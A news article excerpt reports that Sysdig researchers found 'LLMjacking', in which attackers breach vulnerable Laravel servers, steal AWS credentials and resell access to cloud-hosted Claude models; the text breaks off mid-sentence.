Researchers Uncover 'LLMjacking' Scheme Targeting Cloud-Hosted AI Models
May 10, 2024
Vulnerability / Cloud Security
Cybersecurity researchers have discovered a novel attack that employs stolen cloud credentials to target cloud-hosted large language model (LLM) services with the goal of selling access to other threat actors. The attack technique has been codenamed LLMjacking by the Sysdig Threat Research Team. "Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers," security researcher Alessandro Brucato said . "In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted." The intrusion pathway used to pull off the scheme entails breaching a system running a vulnerable version of the Laravel Framework (e.g., CVE-2021-3129 ), followed by getting hold of Amazon Web Services (AWS) credentials to access the LLM services. Among the tools used is an open-source Python script that checks and validates keys f...